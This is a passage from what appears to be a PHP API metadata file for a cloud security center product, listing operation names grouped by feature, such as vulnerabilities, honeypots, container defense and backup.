'1.0', 'info' => ['style' => 'RPC', 'product' => 'Sas', 'version' => '2018-12-03'], 'directories' => [ [ 'children' => ['UpdateUnknownThreatDetectStrategy', 'UpdateUnknownThreatDetectProcess', 'OperateUnknownThreatDetectMachine', 'ListUnknownThreatDetectStrategy', 'ListUnknownThreatDetectProcess', 'ListUnknownThreatDetectMachine', 'ListUnknownThreatDetectEvent', 'HandleUnknownThreatDetectEvent', 'GetUnknownThreatDetectStatistic', 'DeleteUnknownThreatDetectStrategy', 'DeleteUnknownThreatDetectProcess', 'CreateUnknownThreatDetectStrategy', 'AddUnknownThreatDetectProcess'], 'type' => 'directory', 'title' => 'Intelligent behavior analysis', ], [ 'children' => ['ListPublishBatch', 'UpdatePublishBatch', 'UpdatePublishGraySwitch', 'UpdatePublishCron', 'UpgradeVersionByUuids', 'UpdatePublishAutoUpgrade'], 'type' => 'directory', 'title' => 'Custom Agent Upgrade', ], [ 'children' => ['UpdateHybridProxy', 'ModifyHybridProxyCluster', 'ModifyHybridProxyPolicy', 'UnBindHybridProxy', 'DescribeHybridProxyPolicy', 'DescribeHybridProxyList', 'DescribeHybridProxyClusterList', 'DescribeHybridProxyLinkedClientList', 'DeleteHybridProxyCluster', 'DeleteHybridProxy', 'DescribeDefaultProxyInstallVersion'], 'type' => 'directory', 'title' => 'Add Proxy', ], [ 'children' => ['DescribeReportExport', 'DescribeChartList', 'DescribeReportRecipientStatus'], 'type' => 'directory', 'title' => 'Security Report', ], [ 'children' => ['ModifyProcessWhiteList', 'UpdateWhiteListStrategyStatus', 'DescribeWhiteListProcess'], 'type' => 'directory', 'title' => 'Application Whitelist', ], [ 'children' => ['DeleteMaliciousFileWhitelistConfig', 'UpdateMaliciousFileWhitelistConfig', 'CreateMaliciousFileWhitelistConfig', 'ListMaliciousFileWhitelistConfigs', 'DeleteMaliciousNote', 'RetryAgentlessTask', 'ListAgentlessRegion'], 'type' => 'directory', 'title' => 'Agentless Detection', ], [ 'children' => ['ListFileProtectPluginStatus', 'UpdateFileProtectEventStatus', 'GetFileProtectDashboard', 'ListFileProtectEvent', 'UpdateFileProtectRemark', 'GetFileProtectEvent'], 'type' => 'directory', 'title' => 'Core File Monitoring', ], [ 'children' => [ [ 'children' => ['ListContainerDefenseRuleClusters', 'ListContainerDefenseRule', 'GetContainerDefenseRuleDetail', 'ModifyContainerDefenseRule', 'ModifyContainerDefenseRuleSwitch'], 'type' => 'directory', 'title' => 'Non-Mirror Program Defense', ], [ 'children' => ['ListOpaClusterStrategyNew', 'CreateOpaStrategyNew', 'GetOpaStrategyDetailNew', 'UpdateOpaStrategyNew', 'DeleteOpaStrategyNew', 'GetOpaClusterLabelList', 'GetOpaClusterImageList', 'GetOpaClusterNamespaceList', 'DescribeMatchedMaliciousNames'], 'type' => 'directory', 'title' => 'Risk mirror blocking', ], [ 'children' => ['ListAegisContainerPluginRule'], 'type' => 'directory', 'title' => 'Container Escape Prevention', ], ], 'type' => 'directory', 'title' => 'Proactive Defense for Containers', ], [ 'children' => ['ListSasContainerWebDefenseRule', 'GetSasContainerWebDefenseRule', 'OperateSwitchStatus', 'ModifySasContainerWebDefenseRule'], 'type' => 'directory', 'title' => 'Container File Protection', ], [ 'children' => ['ListInterceptionTargetPage', 'ModifyInterceptionTarget', 'ListClusterInterceptionConfig', 'ListClusterCnnfStatusDetail', 'ModifyInterceptionRule', 'ModifyInterceptionRuleSwitch'], 'type' => 'directory', 'title' => 'Container firewall', ], [ 'children' => ['DescribeClientConfStrategy', 'DescribeClientConfSetup', 'DescribeInstallCode', 'DeleteInstallCode', 'ListPluginForUuid', 'UnbindAegis', 'DescribeAgentInstallStatus', 'DescribeInstallCaptcha', 'DescribeInstallCodes', 'ListUninstallAegisMachines', 'DescribeClientProblemType'], 'type' => 'directory', 'title' => 'Agent client', ], [ 'children' => [ 'DeleteSearchCondition', 'ModifySearchCondition', 'DescribeGroupStruct', 'ListCloudAssetInstances', 'DescribeImageInfoList', 'DescribeLogShipperStatus', 'GetCloudAssetSummary', 'GetCloudAssetDetail', 'ModifyAssetImportant', 'ModifyGroupProperty', 'DeleteGroup', 'DeleteTagWithUuid', 'ModifyLoginBaseConfig', 'ModifyPushAllTask', 'DescribeAssetDetailByUuid', 'DescribeGroupedInstances', 'QueryGroupIdByGroupName', 'DescribeAssetSummary', 'DescribeAllEntity', 'DescribeFieldStatistics', 'DescribeGroupedTags', 'DescribeAllGroups', 'DescribeInstanceStatistics', 'DescribeDomainCount', 'DescribeDomainList', 'DescribeDomainDetail', 'DescribeCloudCenterInstances', 'DescribeSearchCondition', 'DescribeCriteria', 'DescribeAssetDetailByUuids', 'DescribeImageStatistics', 'DescribeContainerStatistics', 'ModifyAssetGroup', 'DescribeSasPmAgentList', 'ModifyAssetCleanConfig', 'AddCloudVendorAccountAK', 'DeleteCloudVendorAccountAK', 'DescribeCloudVendorAccountAKList', 'ModifyCloudVendorAccountAK', 'AddCloudVendorTrialConfig', 'SetSyncRefreshRegion', 'GetSupportedModules', ], 'type' => 'directory', 'title' => 'Asset management', ], [ 'children' => ['DescribePropertyUsageTop', 'DescribePropertyScaProcessDetail', 'GetAssetsPropertyItem', 'GetAssetsPropertyDetail', 'DescribePropertyCronDetail', 'DescribePropertyCount', 'DescribePropertyPortDetail', 'DescribePropertyProcDetail', 'DescribePropertyPortItem', 'DescribePropertySoftwareDetail', 'DescribePropertyUserDetail', 'DescribeModuleConfig', 'DescribePropertyScaDetail'], 'type' => 'directory', 'title' => 'Asset fingerprints', ], [ 'children' => ['GetSecurityScoreRule', 'ChangeSecurityScoreRule', 'DescribeSecureSuggestion'], 'type' => 'directory', 'title' => 'Security score', ], [ 'children' => ['DescribeExposedInstanceCriteria', 'DescribeExposedInstanceList', 'DescribeExposedStatistics', 'DescribeExposedStatisticsDetail'], 'type' => 'directory', 'title' => 'Asset exposure analysis', ], [ 'children' => ['ListUuidsByAppId', 'ListMachineApps', 'DescribeContainerTags', 'DescribeAssetsSecurityEventSummary', 'DescribeImage', 'DescribeContainerCriteria', 'DescribeContainerInstances', 'DescribeImageCriteria', 'DescribeImageInstances', 'DescribeImageRepoDetailList', 'DescribeImageRepoCriteria', 'DescribeGroupedContainerInstances', 'RefreshContainerAssets'], 'type' => 'directory', 'title' => 'Container management', ], [ 'children' => ['DescribeClusterNetwork', 'FindContainerNetworkConnect'], 'type' => 'directory', 'title' => 'Container visualization', ], [ 'children' => [ 'UpdateWhiteList', 'GetRegistryScanDayNum', 'GetDockerhubImageRiskStatistic', 'ListImageRegistryExtra', 'SetBuildRiskDefineRuleConfig', 'ListPrivateRegistryType', 'ListPrivateRegistryList', 'SaveImageBaselineStrategy', 'OperateImageBaselineWhitelist', 'DescribeImageBaselineStrategy', 'DescribeImageBaselineItemList', 'DescribeImageBaselineDetail', 'DescribeImageBaselineCheckResult', 'DescribeAllImageBaseline', 'DescribeImageListBySensitiveFile', 'OpenSensitiveFileScan', 'DescribeImageSensitiveFileList', 'DescribeImageSensitiveFileByKey', 'DescribeAffectedMaliciousFileImages', 'DescribeGroupedMaliciousFiles', 'DescribeImageVulList', 'DescribeImageGroupedVulList', 'DescribeImageListWithBaselineName', 'DescribeImageFixTask', 'DescribeImageScanAuthCount', 'DescribeImageBaselineCheckSummary', 'PublicCreateImageScanTask', 'DescribeCountScannedImage', ], 'type' => 'directory', 'title' => 'Image security scans', ], [ 'children' => [ 'CreateCheckPolicy', 'CreateCheckItem', 'DeleteCheckItem', 'ListCheckItems', 'UpdateCheckPolicy', 'GetCheckSale', 'ModifyCheckRule', 'VerifyCheckInstanceResult', 'VerifyCheckResult', 'RemoveCheckResultWhiteList', 'AddCheckResultWhiteList', 'RemoveCheckInstanceResultWhiteList', 'GetCheckSummary', 'ListInstanceCatalog', 'SubmitCheck', 'ChangeCheckConfig', 'GetCheckConfig', 'GetCheckCountStatistic', 'ListCheckInstanceResult', 'ListCheckResult', 'ListCheckStandard', 'ListCheckItem', 'StartBaselineSecurityCheck', 'DescribeRiskItemType', 'DescribeRiskCheckSummary', 'DescribeRiskCheckResult', 'DescribeRiskCheckItemResult', 'ListCheckRule', 'ListOperationTask', 'VerifyCheckCustomConfig', 'ListCheckPolicies', 'UpdateCheckItem', 'DeleteCheckPolicy', ], 'type' => 'directory', 'title' => 'Configuration Assessment', ], [ 'children' => ['DeleteBackupSnapshot', 'QueryPreCheckDatabase', 'ModifyUniBackupPolicy', 'DescribeUniBackupPolicyDetail', 'CreateUniRestorePlan', 'DescribeBackupMachineStatus', 'UpgradeBackupPolicyVersion', 'DescribeExcludeSystemPath', 'DescribeBackupClients', 'DescribeBackupPolicies', 'DescribeSupportRegion', 'DescribeBackupRestoreCount', 'ModifyBackupPolicyStatus', 'DeleteBackupPolicy'], 'type' => 'directory', 'title' => 'Protection against ransomware', ], [ 'children' => ['ModifyWebLockDeleteConfig', 'ModifyWebLockCreateConfig', 'ModifyWebLockUpdateConfig', 'ModifyWebLockStart', 'ModifyWebLockStatus', 'ModifyWebLockUnbind', 'OperateWebLockFileEvents', 'ModifyWebLockProcessStatus', 'DescribeWebLockExclusiveFileType'], 'type' => 'directory', 'title' => 'Tamper protection', ], [ 'children' => ['DescribeLatestScanTask', 'CreateVirusScanOnceTask', 'ListVirusScanMachine', 'ListVirusScanMachineEvent', 'ListVirusScanTask', 'GetVirusScanConfig', 'OperateVirusEvents'], 'type' => 'directory', 'title' => 'Virus detection', ], [ 'children' => ['DescribeGraph4InvestigationOnline', 'DescribeSecurityEventMarkMissList', 'DescribeBackUpExportInfo', 'ListUuidsByWebPath', 'DescribeNsasSuspEventType', 'UpdateStrictEventName', 'CreateSuspEventNote', 'CreateSimilarSecurityEventsQueryTask', 'DescribeSuspEventDetail', 'DescribeSimilarEventScenarios', 'DescribeSecurityStatInfo', 'DescribeLoginBaseConfigs', 'DescribeAttackAnalysisData', 'OperationSuspEvents'], 'type' => 'directory', 'title' => 'Alerts', ], [ 'children' => ['ModifyCustomBlockRecord', 'DeleteCustomBlockRecord', 'ModifyAntiBruteForceRule', 'ModifyInstanceAntiBruteForceRule', 'DescribeInstanceAntiBruteForceRules', 'DescribeAntiBruteForceRules', 'DeleteAntiBruteForceRule'], 'type' => 'directory', 'title' => 'Brute-force attacks protection', ], [ 'children' => [ 'ListVulGlobalConfig', 'OperateImageVul', 'ModifyVulTarget', 'ModifyVulConfig', 'ModifyConcernNecessity', 'ModifyAutoDelConfig', 'DescribeVulNumStatistics', 'DescribeVulListPage', 'DescribeMachineCanReboot', 'DescribeEmgUserAgreement', 'DescribeClusterVulStatistics', 'DescribeAppVulScanCycle', 'ListVulAutoRepairConfig', 'DescribeInstanceRebootStatus', 'RebootMachine', 'ModifyVulTargetConfig', 'ModifyStartVulScan', 'ModifyEmgVulSubmit', 'ModifyCreateVulWhitelist', 'GetVulWhitelist', 'DeleteVulWhitelist', 'DescribeEmgVulItem', 'DescribeConcernNecessity', 'DescribeVulWhitelist', 'ExportVul', 'DescribeVulExportInfo', 'GetVulStatistics', ], 'type' => 'directory', 'title' => 'Vulnerabilities', ], [ 'children' => [ 'ListBaselineCheckWhiteRecord', 'ListCheckItemWarningSummary', 'ListCheckItemWarningMachine', 'DescribeHcExportInfo', 'DescribeRisks', 'DescribeCheckFixDetails', 'IgnoreCheckItems', 'DescribeExposedCheckWarning', 'DescribeCheckWarningSummary', 'DescribeCheckWarnings', 'DescribeCheckWarningDetail', 'DescribeWarningMachines', 'DescribeCheckEcsWarnings', 'DescribeStrategyDetail', 'ExportWarning', 'DescribeStrategy', 'DeleteStrategy', 'ValidateHcWarnings', 'DescribeCustomizedStrategyTargets', 'UpdateBaselineCheckWhiteRecord', 'DeleteCustomizedDict', 'DescribeDefaultKeyInfo', 'CreateUserSetting', 'ExecStrategy', ], 'type' => 'directory', 'title' => 'Baselines', ], [ 'children' => ['ListSystemRuleAggregationTypes', 'ListClientUserDefineRules', 'ListSystemClientRuleTypes', 'ListSystemClientRules', 'ListSystemAggregationRules', 'ModifyClientUserDefineRule', 'ListClientUserDefineRuleTypes', 'GetClientUserDefineRule', 'DeleteClientUserDefineRule', 'AddClientUserDefineRule'], 'type' => 'directory', 'title' => 'Malicious Behavior Defense', ], [ 'children' => ['ModifyAccessKeyLeakDeal', 'DescribeAccesskeyLeakList', 'DescribeAccessKeyLeakDetail'], 'type' => 'directory', 'title' => 'AccessKey Leak Detection', ], [ 'children' => ['GetHoneypotAttackStatistics', 'UpdateHoneypotNode', 'GetHoneypotNode', 'UpdateHoneypot', 'ListHoneypot', 'UpdateHoneypotPreset', 'UpdateHoneypotProbe', 'ListHoneypotProbe', 'DeleteHoneypotPreset', 'DeleteVpcHoneyPot', 'DescribeHoneyPotAuth', 'DescribeHoneyPotSuspStatistics'], 'type' => 'directory', 'title' => 'Honey', ], [ 'children' => ['ModifyLogMetaStatus', 'DescribeLogMeta', 'ModifyOpenLogShipper', 'DescribeLogstoreStorage', 'ModifyClearLogstoreStorage'], 'type' => 'directory', 'title' => 'Log analysis', ], [ 'children' => ['ModifyNoticeConfig', 'DescribeDingTalk', 'DescribeNoticeConfig', 'DescribeDataSource'], 'type' => 'directory', 'title' => 'Notifications', ], [ 'children' => ['DeleteAutoTagRules', 'DeleteIdcProbe', 'ModifyIdcProbe', 'DescribeCommonTargetResultList', 'OperateSuspiciousOverallConfig', 'DescribeCommonOverallConfig', 'OperateCommonTargetConfig'], 'type' => 'directory', 'title' => 'Setting', ], [ 'children' => ['DescribeExportInfo', 'ExportRecord'], 'type' => 'directory', 'title' => 'Export check results', ], [ 'children' => ['GetFileDetectApiInvokeInfo', 'CreateFileDetect', 'GetFileDetectResult', 'ListCompressFileDetectResult'], 'type' => 'directory', 'title' => 'File detect', ], [ 'children' => ['ListOssScanConfig', 'GetObjectScanEvent', 'ListObjectScanEvent', 'GetOssBucketScanStatistic', 'ListOssBucketScanInfo', 'UpdateOssScanConfig', 'ListOssBucket', 'CreateOssScanConfig', 'ListSupportObjectSuffix', 'RefreshOssBucketScanInfo', 'GetOssScanConfig'], 'type' => 'directory', 'title' => 'Malicious file detection OSS', ], [ 'children' => ['GenerateOnceTask', 'DeleteCycleTask', 'ModifyCycleTask', 'DescribeOnceTask', 'DescribeCycleTaskList', 'GetOnceTaskResultInfo', 'GetLastOnceTaskInfo', 'DescribeOnceTaskLeafRecordPage'], 'type' => 'directory', 'title' => 'Client Mission Management', ], [ 'children' => ['UpdateSelectionKeyByType'], 'type' => 'directory', 'title' => 'Asset Selection', ], [ 'children' => ['CreateSoarStrategyTask', 'DeleteSoarStrategyTask', 'DescribeSoarStrategyTaskDetail', 'ModifySoarStrategySubscribe', 'DescribeSoarSubscribedStrategy', 'DescribeSyncAssetTaskLogDetail', 'DescribeSoarStrategyTaskParams', 'ProcessSoarStrategyTask', 'DescribeSoarStrategyTaskResult'], 'type' => 'directory', 'title' => 'Playbook', ], [ 'children' => ['DescribeDomainSecureVulList', 'DescribeDomainSecureRiskList', 'DescribeDomainSecureAlarmList', 'DescribeDomainSecureStatistics', 'DescribeDomainSecureScore'], 'type' => 'directory', 'title' => 'Website Security', ], [ 'children' => ['GetAuthSummary', 'DescribeVersionConfig', 'ModifyPostPayModuleSwitch', 'UpdatePostPaidBindRel', 'BindAuthToMachine'], 'type' => 'directory', 'title' => 'Billing', ], [ 'children' => [ 'DescribeClusterBasicInfo', 'DescribeQuaraFileDownloadInfo', 'DescribeAffectedAssets', 'DescribeEventOnStage', 'DescribeTraceInfoDetail', 'DescribeImageLatestScanTask', 'DescribeImageRepoList', 'PageImageRegistry', 'QueryJenkinsImageRegistryPersistenceDay', 'UpdateJenkinsImageRegistryName', 'UpdateJenkinsImageRegistryPersistenceDay', 'DeleteInterceptionRule', 'DeleteInterceptionTarget', 'DescribeCustomBlockRecords', 'ListInterceptionHistory', 'GetInterceptionRuleDetail', 'ListImageRegistryRegion', 'DeletePrivateRegistry', 'ListPodRisk', 'ListImageRisk', 'DeleteServiceTrail', 'CreateServiceTrail', 'DescribeMonitorAccounts', 'DescribeImageVulWhiteList', 'QueryAttackCount', 'GetSwitchRegionDetail', 'UpdateImageVulWhitelistTarget', 'DeleteImageVulWhitelist', 'DescribeContainerScanConfig', 'ModifyContainerScanConfig', 'DescribeCanFixVulList', 'ModifyImageFixCycleConfig', 'DescribeImageFixCycleConfig', 'ListHoneypotProbeUuid', 'UpdateHoneypotProbeBind', 'ListHoneypotEvents', 'ListHoneypotAttackerPortrait', 'ListHoneypotAttackerSource', 'UpdateCommonSwitchConfig', 'UpdateFileUploadLimit', 'GetFileDetectReport', 'DescribeImageEventOperationPage', 'DescribeImageEventOperationCondition', 'UpdateImageEventOperation', 'DeleteImageEventOperation', 'ListGroups', 'UploadedHoneyPotFile', 'ListHoneypotEventFlows', 'ModifyImageRegistry', 'DeleteK8sAccessInfo', 'DeleteContainerPluginRule', 'ModifyContainerPluginRule', 'DeleteSasContainerWebDefenseRule', 'ListK8sAccessInfo', 'GenerateK8sAccessInfo', 'MarkMonitorAccounts', 'UnMarkMonitorAccounts', 'ListUnfinishedOnceTask', 'DeleteVulAutoRepairConfig', 'DescribeFixUsedCount', 'DeleteAttestor', 'DescribeClusterHostSecuritySummary', 'DescribeClusterImageSecuritySummary', 'DescribeCustomizedDictUploadInfo', 'CreateCustomizedDict', 'DescribeContainerServiceK8sClusterKritisStatus', 'UpgradeHoneypotNode', 'QueryGuidTaskList', 'ReceiveFunctionTrialRewardByAliUid', 'DescribeAgentlessSensitiveFileByKey', 'GetCheckStructure', 'DescribeDynamicDictUploadInfo', 'DeleteCustomizeReport', 'DescribeCustomizeReportConfigDetail', 'DescribeDynamicDict', 'DescribeIdcProbeScanResultList', 'DescribeSupervisonInfo', 'GetDefenceCount', 'OperationCustomizeReportChart', 'SaveCustomizeReportConfig', 'SendCustomizeReport', 'UpdateCustomizeReportStatus', 'ListLogShipperRegions', 'UpdateTargetListByBatch', 'DescribeScreenScoreThread', 'DescribeChartData', 'OpenBackupAutoConfig', 'GetAegisContainerPluginRule', 'SubmitOperationTask', 'CheckTrialFixCount', 'CreateMonitorAccount', 'DeleteMonitorAccount', 'ListAccountsInResourceDirectory', 'CreateRdDefaultSyncList', 'DescribeIdcAssetCriteria', 'DescribeImageListByBuildRisk', 'DescribeImageBuildRiskList', 'DescribeImageBuildRiskByKey', 'DescribeNeedAsyncQuery', 'ListPrivateK8s', 'DescribeCheckWarningCount', 'GetCurrentVersionPublish', 'DescribeInstanceVulStatistics', 'SetImageBuildRiskStatus', 'ListOperationProcessDetail', 'ListOperationProcess', 'DescribeDomainSecureSuggests', 'DescribeIdcProbeList', 'DescribeImageRiskLevelStatistic', 'DescribeImageSecurityScanCount', 'GetDockerhubImageRiskRankInfo', 'ListDockerhubImage', 'ListUserVpc', 'ListTargetByBatch', 'GetInstanceAlarmStatistics', 'GrantSwitchAgreement', 'ModifyServerlessAuthToMachine', 'ModifyBinarySecurityPolicy', 'DeleteAttackPathWhitelist', 'ListSupportAttackPathAsset', 'UpdateAttackPathSensitiveAssetConfig', 'GetAttackPathEventDetail', 'InstallAegisForLingjun', 'ListAegisForLingjunStatus', 'DescribeAIAssetSummary', 'DescribePluginSummary', 'DescribeCustomizedDict', 'ListUniBackupRecord', 'HandleSimilarMaliciousFiles', 'GenerateClusterScannerWebhookYaml', 'DescribeClusterScannerList', 'GetClusterScannerYaml', 'GetAgentlessTaskUsedSizeEstimate', 'ListCloudAssetMatchOperators', 'ListCloudAssetSchemas', 'UpdateMultiUserInstances', 'GetInstanceAuthRange', 'ListMultiUserInstances', 'DescribeCloudVendorProductTemplateConfig', 'GetValidDeductInstances', 'ListAttackEventInfo', 'GetAttackEventDetail', 'GetAttackEventDashboard', 'DescribeSuspiciousSecurityEventyStatistics', 'ListClusterCheckResult', 'GetClusterCheckSummary', 'ListKspmInstances', 'AddFileProtectBindMachine', 'CreateFileProtectClientRule', 'DeleteFileProtectClientRule', 'DescribeFrontVulPatchList', 'DescribeGroupedVul', 'DescribeScanTaskProgress', 'DescribeSnapshots', 'DescribeSuspEvents', 'DescribeVulDetails', 'DescribeVulList', 'GetFileProtectClientEvent', 'GetFileProtectClientEventDashboard', 'GetFileProtectClientRule', 'GetFileProtectClientRuleDashboard', 'HandleObjectScanEvent', 'ListFileProtectBindMachine', 'ListFileProtectClientEvent', 'ListFileProtectClientRule', 'ListFileProtectClientRuleFileType', 'OperateVuls', 'UpdateFileProtectClientEvent', 'UpdateFileProtectClientRule', 'UpdateFileProtectClientRuleStatus', 'CreateServiceLinkedRole', 'DescribeBackupPolicy', 'ModifyBackupPolicy', ], 'type' => 'directory', 'title' => 'Other', ], [ 'children' => [ 'AddAssetSelectionCriteria', 'AddBaselineCheckWhiteRecord', 'AddCheckInstanceResultWhiteList', 'AddContainerDefenseRule', 'AddContainerPluginRule', 'AddIdcProbe', 'AddImageEventOperation', 'AddImageVulWhiteList', 'AddInstallCode', 'AddPrivateRegistry', 'AddProtectVpcList', 'AddPublishBatch', 'AddSasContainerWebDefenseRule', 'AddSasModuleTrial', 'AddTagWithUuid', 'AddUninstallClientsByUuids', 'AddVpcHoneyPot', 'AdvanceSecurityEventOperations', 'BatchCreateMaliciousNote', 'BatchDeleteMaliciousFileWhitelistConfig', 'BatchOperateCommonOverallConfig', 'BatchUpdateMaliciousFileWhitelistConfig', 'BindHybridProxy', 'CancelOnceTask', 'ChangeAssetRefreshTaskConfig', 'ChangeCheckCustomConfig', 'ChangeCheckScopeConfigInstance', 'ChangeUserLang', 'CheckSecurityEventId', 'CheckStsTokenAuth', 'CheckUserHasEcs', 'ConfirmVirusEvents', 'CopyCustomizeReportConfig', 'CreateAgentlessScanTask', 'CreateAntiBruteForceRule', 'CreateAssetSelectionConfig', 'CreateAttackPathSensitiveAssetConfig', 'CreateAttackPathWhitelist', 'CreateAttestor', 'CreateBackupPolicy', 'CreateBatchUploadUrl', 'CreateBinarySecurityPolicy', 'CreateContainerScanTask', 'CreateContainerScanTaskByAppName', 'CreateCustomBlockRecord', 'CreateCycleTask', 'CreateDynamicDict', 'CreateFileDetectUploadUrl', 'CreateFileProtectRule', 'CreateFileUploadLimit', 'CreateHoneypot', 'CreateHoneypotNode', 'CreateHoneypotPreset', 'CreateHoneypotProbe', 'CreateHoneypotProbeBind', 'CreateHybridProxyCluster', 'CreateInterceptionRule', 'CreateInterceptionTarget', 'CreateJenkinsImageRegistry', 'CreateJenkinsImageScanTask', 'CreateMaliciousNote', 'CreateOpaClusterPlugin', 'CreateOrUpdateAssetGroup', 'CreateOrUpdateAutoTagRule', 'CreateOrUpdateDingTalk', 'CreateOssBucketScanTask', 'CreateRestoreJob', 'CreateSasTrial', 'CreateUniBackupPolicy', 'CreateVulAutoRepairConfig', 'DeleteAttackPathSensitiveAssetConfig', 'DeleteBackupPolicyMachine', 'DeleteBaselineCheckWhiteRecord', 'DeleteBinarySecurityPolicy', 'DeleteContainerDefenseRule', 'DeleteDingTalk', 'DeleteFileProtectRule', 'DeleteHoneypot', 'DeleteHoneypotNode', 'DeleteHoneypotProbe', 'DeleteHoneypotProbeBind', 'DeleteLoginBaseConfig', 'DeleteOssScanConfig', 'DeleteSecurityEventMarkMissList', 'DeleteSuspEventNode', 'DeleteUniBackupPolicy', 'DescribeAlarmEventDetail', 'DescribeAlarmEventStackInfo', 'DescribeAllRegionsStatistics', 'DescribeAssetsScaProcessNum', 'DescribeAttestors', 'DescribeAutoDelConfig', 'DescribeBackupFiles', 'DescribeBinarySecurityPolicies', 'DescribeBruteForceRecords', 'DescribeBruteForceSummary', 'DescribeCanAccessVpcSale', 'DescribeCanTrySas', 'DescribeCheckResult', 'DescribeCheckWarningMachines', 'DescribeCloudProductFieldStatistics', 'DescribeCloudVendorTrialConfig', 'DescribeClusterInfoList', 'DescribeCommonOverallConfigList', 'DescribeCommonTargetConfig', 'DescribeContainerApps', 'DescribeContainerFieldStatistics', 'DescribeContainerGroupedFieldDetail', 'DescribeContainerServiceK8sClusterNamespaces', 'DescribeContainerServiceK8sClusters', 'DescribeCountNotScannedImage', 'DescribeCustomBlockInstances', 'DescribeCustomizeReportList', 'DescribeEventLevelCount', 'DescribeExposedInstanceDetail', 'DescribeLoginSwitchConfigs', 'DescribeOfflineMachines', 'DescribePropertyCronItem', 'DescribePropertyProcItem', 'DescribePropertyScaItem', 'DescribePropertyScheduleConfig', 'DescribePropertySoftwareItem', 'DescribePropertyTypeScaItem', 'DescribePropertyUserItem', 'DescribeRestoreJobs', 'DescribeRestorePlans', 'DescribeRiskListCheckResult', 'DescribeRiskType', 'DescribeScanTaskStatistics', 'DescribeSecurityCheckScheduleConfig', 'DescribeSecurityEventOperationStatus', 'DescribeSecurityEventOperations', 'DescribeServiceLinkedRoleStatus', 'DescribeSimilarSecurityEvents', 'DescribeSoarPlaybookTaskDetail', 'DescribeSoarStrategies', 'DescribeSoarStrategyParam', 'DescribeSoarStrategyTasks', 'DescribeStrategyExecDetail', 'DescribeStrategyTarget', 'DescribeStrictEventName', 'DescribeSummaryInfo', 'DescribeSuspEventExportInfo', 'DescribeSuspEventQuaraFiles', 'DescribeSuspEventUserSetting', 'DescribeSuspiciousOverallConfig', 'DescribeSuspiciousUUIDConfig', 'DescribeSyncAssetTaskList', 'DescribeTarget', 'DescribeTaskErrorLog', 'DescribeTotalStatistics', 'DescribeTraceInfoNode', 'DescribeUniBackupDatabase', 'DescribeUniBackupPolicies', 'DescribeUniBackupStatistics', 'DescribeUniRecoverableList', 'DescribeUniSupportRegion', 'DescribeUserBackupMachines', 'DescribeUserBaselineAuthorization', 'DescribeUserSetting', 'DescribeUuidsByVulNames', 'DescribeVendorList', 'DescribeVolDingdingMessage', 'DescribeVpcHoneyPotCriteria', 'DescribeVpcHoneyPotList', 'DescribeVpcList', 'DescribeVulCheckTaskStatusDetail', 'DescribeVulConfig', 'DescribeVulDefendCountStatistics', 'DescribeVulFixStatistics', 'DescribeVulMetaCountStatistics', 'DescribeVulTargetConfig', 'DescribeVulTargetStatistics', 'DescribeWarningExportInfo', 'DescribeWebLockBindList', 'DescribeWebLockConfigList', 'DescribeWebLockFileChangeStatistics', 'DescribeWebLockFileEvents', 'DescribeWebLockFileTypeSummary', 'DescribeWebLockInclusiveFileType', 'DescribeWebLockProcessBlockStatistics', 'DescribeWebLockProcessList', 'DescribeWebLockStatus', 'DescribeWebLockTotalFileChangeCount', 'DescribeWebPath', 'DescribeWhiteListAsset', 'DescribeWhiteListAuthorize', 'DescribeWhiteListEffectiveAssets', 'DescribeWhiteListStrategyList', 'DescribeWhiteListStrategyStatistics', 'DescribeWhiteListStrategyUuidCount', 'DingTalkOnlineTest', 'DisableBruteForceRecord', 'DisableCustomBlockRecord', 'EnableBruteForceRecord', 'EnableCustomBlockRecord', 'EnableCustomInstanceBlockRecord', 'EnableServiceAccessResourceDirectory', 'ExportCustomizeReport', 'ExportSuspEvents', 'FinishGuidTask', 'FixCheckWarnings', 'GenerateDynamicDict', 'GetAccountLabel', 'GetAegisContainerPluginRuleCriteria', 'GetAgentlessTaskCount', 'GetAlarmMachineCount', 'GetAppNetwork', 'GetAssetDetailByUuid', 'GetAssetSelectionConfig', 'GetAttackPathEventStatistics', 'GetAttackPathSensitiveAssetConfig', 'GetAttackPathWhitelist', 'GetAttackTypeList', 'GetAuthVersionStatistic', 'GetBackupAutoConfigStatus', 'GetBackupStorageCount', 'GetBuildRiskDefineRuleConfig', 'GetCanTrySas', 'GetCheckDetail', 'GetCheckProcess', 'GetCheckRiskStatistics', 'GetCheckScopeConfig', 'GetCheckTimeDimensionStatistic', 'GetClientRatioStatistic', 'GetCloudAssetCriteria', 'GetClusterCheckItemWarningStatistics', 'GetClusterRuleSummary', 'GetClusterStrategyCount', 'GetClusterSuspEventStatistics', 'GetCommonSwitchConfig', 'GetConsoleFuncGrayStatus', 'GetDataTrend', 'GetFileProtectEventCount', 'GetFileProtectRule', 'GetFileUploadLimit', 'GetFunctionTrialStatus', 'GetHoneyPotUploadPolicyInfo', 'GetHoneypotEventTrend', 'GetHoneypotNodeMetricList', 'GetHoneypotPreset', 'GetHoneypotProbe', 'GetHoneypotStatistics', 'GetImageEventOperation', 'GetImageScanNumInPeriod', 'GetInstallCodeForUuid', 'GetInterceptionSummary', 'GetInterceptionTargetDetail', 'GetLocalDefaultRegion', 'GetLogMeta', 'GetMaliciousFileWhitelistConfig', 'GetModuleConfig', 'GetModuleConfigStatus', 'GetModuleTrialAuthInfo', 'GetOpaClusterBaseLineList', 'GetOpaPluginStatus', 'GetOpaStrategyTemplateSummary', 'GetPropertyScheduleConfig', 'GetPublishCron', 'GetRdTree', 'GetRulesCount', 'GetSasContainerWebDefenseRuleApplication', 'GetSasContainerWebDefenseRuleCriteria', 'GetSensitiveDefineRuleConfig', 'GetServerlessAppAuthDetail', 'GetServerlessAuthSummary', 'GetServiceTrail', 'GetStrategyTemplateDetail', 'GetSuspiciousStatistics', 'GetTenantCheckAvailable', 'GetUserLang', 'GetVirusScanLatestTaskStatistic', 'HandleMaliciousFiles', 'HandleSecurityEvents', 'HandleSimilarSecurityEvents', 'IgnoreHcCheckWarnings', 'IgnoreIdcProbeScanResult', 'InstallBackupClient', 'InstallCloudMonitor', 'InstallHybridProxy', 'InstallPmAgent', 'InstallUniBackupAgent', 'JoinWebLockProcessWhiteList', 'ListAgentlessAsset', 'ListAgentlessMaliciousFiles', 'ListAgentlessRelateMalicious', 'ListAgentlessRiskUuid', 'ListAgentlessTask', 'ListAssetCleanConfig', 'ListAssetInfoPublish', 'ListAssetRefreshTaskConfig', 'ListAssetSelectionSelectedTarget', 'ListAssetSelectionTarget', 'ListAttackPathEvent', 'ListAttackPathWhitelist', 'ListAutoTagRules', 'ListAvailableAttackPath', 